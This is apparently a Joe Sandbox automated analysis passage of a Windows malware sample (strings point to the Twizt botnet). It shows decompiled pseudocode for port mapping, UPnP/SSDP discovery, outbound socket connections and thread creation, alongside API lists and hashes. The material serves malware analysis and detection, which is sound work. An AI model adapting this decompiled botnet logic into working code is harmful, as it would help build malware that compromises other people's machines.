                                                                                                                                                                                                                                                                  						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                  						 *0x4139dc = _t20;
                                                                                                                                                                                                                                                                  						if( *0x4139dc == 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v20 = E00409260();
                                                                                                                                                                                                                                                                  						_t31 =  *0x4139dc; // 0x0
                                                                                                                                                                                                                                                                  						E0040CCC0(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t26 =  *0x4139dc; // 0x0
                                                                                                                                                                                                                                                                  						_t20 = E0040CCC0(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return E00408AB0(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040cd4a
                                                                                                                                                                                                                                                                  0x0040cd50
                                                                                                                                                                                                                                                                  0x0040cd5b
                                                                                                                                                                                                                                                                  0x0040cd60
                                                                                                                                                                                                                                                                  0x0040cd63
                                                                                                                                                                                                                                                                  0x0040cd6a
                                                                                                                                                                                                                                                                  0x0040cd70
                                                                                                                                                                                                                                                                  0x0040cd82
                                                                                                                                                                                                                                                                  0x0040cd94
                                                                                                                                                                                                                                                                  0x0040cd99
                                                                                                                                                                                                                                                                  0x0040cd9c
                                                                                                                                                                                                                                                                  0x0040cda8
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x0040cdaf
                                                                                                                                                                                                                                                                  0x0040cdc0
                                                                                                                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                                                                                                                  0x0040cddd
                                                                                                                                                                                                                                                                  0x0040cde3
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cdfc
                                                                                                                                                                                                                                                                  0x0040ce02

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040624C), ref: 0040CD4A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID: TCP$UDP
                                                                                                                                                                                                                                                                  • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                  • Opcode ID: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction ID: 59801a5b79b9a69c2d6e15e1ff1d4abc1ee1c9ac4fca949444fada01e75ea631
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C611A5B5E00108EBDB00EFD4D886BAE7775AB44308F10867EE401772C2D6786A00CF49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                                                                                                  			E0040B420(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                  				char _v5;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v13;
                                                                                                                                                                                                                                                                  				char _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				signed char _t43;
                                                                                                                                                                                                                                                                  				signed char _t48;
                                                                                                                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                                                                                                                  				signed char _t53;
                                                                                                                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                                                                                                                  				void* _t80;
                                                                                                                                                                                                                                                                  				void* _t81;
                                                                                                                                                                                                                                                                  				void* _t84;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(InterlockedExchangeAdd(_a4, 0) == 0) {
                                                                                                                                                                                                                                                                  					_v5 = 0;
                                                                                                                                                                                                                                                                  					_t38 = E0040B330(_t37, _a4[1]); // executed
                                                                                                                                                                                                                                                                  					_t81 = _t80 + 4;
                                                                                                                                                                                                                                                                  					_v12 = _t38;
                                                                                                                                                                                                                                                                  					if(_v12 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						return _v5;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InterlockedIncrement(_a4);
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						_t72 =  *0x4139cc; // 0x49492b13
                                                                                                                                                                                                                                                                  						_t43 = E00409DD0(_v12, 0, _t72, 0, _a8, E0040B200, 0); // executed
                                                                                                                                                                                                                                                                  						_t81 = _t81 + 0x1c;
                                                                                                                                                                                                                                                                  						_t63 = _t43 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_t43 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v13 = 1;
                                                                                                                                                                                                                                                                  						while((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  							_v13 = 0;
                                                                                                                                                                                                                                                                  							_t48 = E0040B260(_v12,  &_v20, 4, 0x2710); // executed
                                                                                                                                                                                                                                                                  							_t81 = _t81 + 0x10;
                                                                                                                                                                                                                                                                  							if((_t48 & 0x000000ff) == 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  								L15:
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t49 = E00408840(_v20);
                                                                                                                                                                                                                                                                  								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  								_v24 = _t49;
                                                                                                                                                                                                                                                                  								if(_v24 != 0) {
                                                                                                                                                                                                                                                                  									_t53 = E0040B260(_v12, _v24, _v20, E0040B3C0(_v20)); // executed
                                                                                                                                                                                                                                                                  									_t84 = _t81 + 0x14;
                                                                                                                                                                                                                                                                  									if((_t53 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  										E00409F30(_v12, _v24, _v20, _a4[1], E0040B200, 0, 0); // executed
                                                                                                                                                                                                                                                                  										_t84 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                  										_v13 = 1;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00408990(_v24);
                                                                                                                                                                                                                                                                  									_t81 = _t84 + 4;
                                                                                                                                                                                                                                                                  									goto L15;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v5 = 1;
                                                                                                                                                                                                                                                                  						if(0 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L17:
                                                                                                                                                                                                                                                                  						InterlockedDecrement(_a4);
                                                                                                                                                                                                                                                                  						E00409320(_v12);
                                                                                                                                                                                                                                                                  						goto L18;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00409200(_t63, _a4[1]);
                                                                                                                                                                                                                                                                  					_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  					goto L17;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 0;
                                                                                                                                                                                                                                                                  			}

















                                                                                                                                                                                                                                                                  0x0040b434
                                                                                                                                                                                                                                                                  0x0040b43d
                                                                                                                                                                                                                                                                  0x0040b448
                                                                                                                                                                                                                                                                  0x0040b44d
                                                                                                                                                                                                                                                                  0x0040b450
                                                                                                                                                                                                                                                                  0x0040b457
                                                                                                                                                                                                                                                                  0x0040b576
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b576
                                                                                                                                                                                                                                                                  0x0040b461
                                                                                                                                                                                                                                                                  0x0040b467
                                                                                                                                                                                                                                                                  0x0040b474
                                                                                                                                                                                                                                                                  0x0040b481
                                                                                                                                                                                                                                                                  0x0040b486
                                                                                                                                                                                                                                                                  0x0040b489
                                                                                                                                                                                                                                                                  0x0040b48e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b4a4
                                                                                                                                                                                                                                                                  0x0040b4a8
                                                                                                                                                                                                                                                                  0x0040b4b4
                                                                                                                                                                                                                                                                  0x0040b4c7
                                                                                                                                                                                                                                                                  0x0040b4cc
                                                                                                                                                                                                                                                                  0x0040b4d4
                                                                                                                                                                                                                                                                  0x0040b54f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b4dc
                                                                                                                                                                                                                                                                  0x0040b4e0
                                                                                                                                                                                                                                                                  0x0040b4e5
                                                                                                                                                                                                                                                                  0x0040b4e8
                                                                                                                                                                                                                                                                  0x0040b4ef
                                                                                                                                                                                                                                                                  0x0040b50c
                                                                                                                                                                                                                                                                  0x0040b511
                                                                                                                                                                                                                                                                  0x0040b519
                                                                                                                                                                                                                                                                  0x0040b537
                                                                                                                                                                                                                                                                  0x0040b53c
                                                                                                                                                                                                                                                                  0x0040b53f
                                                                                                                                                                                                                                                                  0x0040b53f
                                                                                                                                                                                                                                                                  0x0040b547
                                                                                                                                                                                                                                                                  0x0040b54c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b54c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b4f1
                                                                                                                                                                                                                                                                  0x0040b4d4
                                                                                                                                                                                                                                                                  0x0040b554
                                                                                                                                                                                                                                                                  0x0040b55a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b560
                                                                                                                                                                                                                                                                  0x0040b564
                                                                                                                                                                                                                                                                  0x0040b56e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b573
                                                                                                                                                                                                                                                                  0x0040b497
                                                                                                                                                                                                                                                                  0x0040b49c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b49c
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040B42C
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(000000FF), ref: 0040B461
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(000000FF), ref: 0040B564
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2813130747-0
                                                                                                                                                                                                                                                                  • Opcode ID: dcea29ff3fde5f95052e9b38f7386806e7db22d04ebcc2f4376cc6777e33fd09
                                                                                                                                                                                                                                                                  • Instruction ID: 1259f7b67e3b06777960e4ca1c2c1531dbe7b130bfe8c24dc9c25c5f98584687
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcea29ff3fde5f95052e9b38f7386806e7db22d04ebcc2f4376cc6777e33fd09
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D4192B5A00209BBDB04EAA4DC45BAF7774AB44308F1480ADB505BB2C2D779EA05C7ED
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E00409BE0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				char _v9;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t23 = E0040A610(__ecx); // executed
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_a8 + 4)) = _t23;
                                                                                                                                                                                                                                                                  				_t4 = _a8 + 0x14; // 0xc483ffff
                                                                                                                                                                                                                                                                  				 *_a8 = E00408B60(_a8 + 4,  *_t4 + 0x14);
                                                                                                                                                                                                                                                                  				_v9 = 0;
                                                                                                                                                                                                                                                                  				_t9 = _a8 + 0x14; // 0xc483ffff
                                                                                                                                                                                                                                                                  				_v16 =  *_t9 + 0x18;
                                                                                                                                                                                                                                                                  				_v8 = E0040A8A0( *_t9 + 0x18, "Twizt", lstrlenA("Twizt"), _a8, _v16);
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v9 = _a12(_a4, _v8, _v16, _a16);
                                                                                                                                                                                                                                                                  					E00408990(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v9;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x00409be6
                                                                                                                                                                                                                                                                  0x00409bee
                                                                                                                                                                                                                                                                  0x00409bf4
                                                                                                                                                                                                                                                                  0x00409c0d
                                                                                                                                                                                                                                                                  0x00409c0f
                                                                                                                                                                                                                                                                  0x00409c16
                                                                                                                                                                                                                                                                  0x00409c1c
                                                                                                                                                                                                                                                                  0x00409c40
                                                                                                                                                                                                                                                                  0x00409c47
                                                                                                                                                                                                                                                                  0x00409c5c
                                                                                                                                                                                                                                                                  0x00409c63
                                                                                                                                                                                                                                                                  0x00409c68
                                                                                                                                                                                                                                                                  0x00409c71

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(Twizt,0040B486,0040B486,?,?,0040B486,000000FF,0040B486,0040B486,000000FF,00000000), ref: 00409C2C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                  • String ID: Twizt$Twizt
                                                                                                                                                                                                                                                                  • API String ID: 1659193697-16428492
                                                                                                                                                                                                                                                                  • Opcode ID: 86c995270a8b4e1efe25b75a84588ef8e8083d449b8eafc4679923207fda7d97
                                                                                                                                                                                                                                                                  • Instruction ID: 2f2341be414910abfcadc5430d6d5253c447beeab5d952ffabf00c82cf953070
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86c995270a8b4e1efe25b75a84588ef8e8083d449b8eafc4679923207fda7d97
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F31142B5900108BFCB04DF98D945E9EBBB5EF48304F14C0A9FD19AB342D635DA51CBA6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040B343
                                                                                                                                                                                                                                                                  • htons.WS2_32(00009E34), ref: 0040B375
                                                                                                                                                                                                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 0040B38F
                                                                                                                                                                                                                                                                    • Part of subcall function 00409320: shutdown.WS2_32(0040930D,00000002), ref: 00409329
                                                                                                                                                                                                                                                                    • Part of subcall function 00409320: closesocket.WS2_32(0040930D), ref: 00409333
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1987800339-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3d7018709f8db77be6610a40ba23cd725aaf1f3e343feca5a0419cd3595f9cdb
                                                                                                                                                                                                                                                                  • Instruction ID: f95c8608c0c51b75464019071f7d8762e66f293dc9f021373c9c7fde71a4d9b5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d7018709f8db77be6610a40ba23cd725aaf1f3e343feca5a0419cd3595f9cdb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F112A74904209ABCB14DFA49A056AEB770AF04320F2042BDE925B73D0D7745B059B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004059C0(void* __ecx, void* _a8, int _a12) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				void* _t12;
                                                                                                                                                                                                                                                                  				void* _t15;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t12 = E00408840(_a12 + 1);
                                                                                                                                                                                                                                                                  				_v8 = _t12;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					memcpy(_v8, _a8, _a12);
                                                                                                                                                                                                                                                                  					 *((char*)(_v8 + _a12)) = 0;
                                                                                                                                                                                                                                                                  					_t15 = CreateThread(0, 0, E00405920, _v8, 0, 0); // executed
                                                                                                                                                                                                                                                                  					return CloseHandle(_t15);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t12;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x004059cb
                                                                                                                                                                                                                                                                  0x004059d3
                                                                                                                                                                                                                                                                  0x004059da
                                                                                                                                                                                                                                                                  0x004059e8
                                                                                                                                                                                                                                                                  0x004059f6
                                                                                                                                                                                                                                                                  0x00405a0a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405a11
                                                                                                                                                                                                                                                                  0x00405a1a

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 004059E8
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE ref: 00405A0A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A11
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2064604595-0
                                                                                                                                                                                                                                                                  • Opcode ID: ae5f4de42ff232c5da4225dffb7ba4ee832ef41c4afc0931220e8827c4dc4e0b
                                                                                                                                                                                                                                                                  • Instruction ID: 5ba13c330f776a4b3e0225179ba57a44d2772828536dfa1eced27069d2347bf7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae5f4de42ff232c5da4225dffb7ba4ee832ef41c4afc0931220e8827c4dc4e0b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F01DB1A00248FBDB10DFA4DD46F5F7378EB48704F248569FA05A7281D675AA10CB69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                                                                                                  			E004086E0(void* __ecx) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				signed char _t5;
                                                                                                                                                                                                                                                                  				long _t7;
                                                                                                                                                                                                                                                                  				signed char _t9;
                                                                                                                                                                                                                                                                  				signed char _t10;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if((E00408570() & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					_t5 = HeapCreate(0, 0, 0); // executed
                                                                                                                                                                                                                                                                  					 *0x412f74 = _t5;
                                                                                                                                                                                                                                                                  					if( *0x412f74 != 0) {
                                                                                                                                                                                                                                                                  						_v8 = 2;
                                                                                                                                                                                                                                                                  						_t9 =  *0x412f74; // 0x2220000
                                                                                                                                                                                                                                                                  						__imp__HeapSetInformation(_t9, 0,  &_v8, 4);
                                                                                                                                                                                                                                                                  						_t7 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                  						 *0x4139a8 = _t7;
                                                                                                                                                                                                                                                                  						return _t7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t10 =  *0x412f74; // 0x2220000
                                                                                                                                                                                                                                                                  					_t5 = E00408650(_t10);
                                                                                                                                                                                                                                                                  					if((_t5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  						goto L2;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t5;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x004086ee
                                                                                                                                                                                                                                                                  0x00408706
                                                                                                                                                                                                                                                                  0x0040870c
                                                                                                                                                                                                                                                                  0x00408712
                                                                                                                                                                                                                                                                  0x0040871e
                                                                                                                                                                                                                                                                  0x00408720
                                                                                                                                                                                                                                                                  0x0040872f
                                                                                                                                                                                                                                                                  0x00408736
                                                                                                                                                                                                                                                                  0x0040873c
                                                                                                                                                                                                                                                                  0x00408742
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408742
                                                                                                                                                                                                                                                                  0x004086f0
                                                                                                                                                                                                                                                                  0x004086f0
                                                                                                                                                                                                                                                                  0x004086f7
                                                                                                                                                                                                                                                                  0x00408704
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408704
                                                                                                                                                                                                                                                                  0x0040874a

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetCurrentProcessId.KERNEL32(?,0040878B,?,0040AD7E,00000010,?,?,?,?,?,?,0040AE9B), ref: 00408573
                                                                                                                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408797,?,0040AD7E,00000010,?,?,?,?,?,?,0040AE9B), ref: 0040870C
                                                                                                                                                                                                                                                                  • HeapSetInformation.KERNEL32(02220000,00000000,00000002,00000004), ref: 00408736
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040873C
                                                                                                                                                                                                                                                                    • Part of subcall function 00408650: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040866C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3179415709-0
                                                                                                                                                                                                                                                                  • Opcode ID: 156125bf305ec4522ec2416c3cfcc047802c257488583dec91db6bf8648615ec
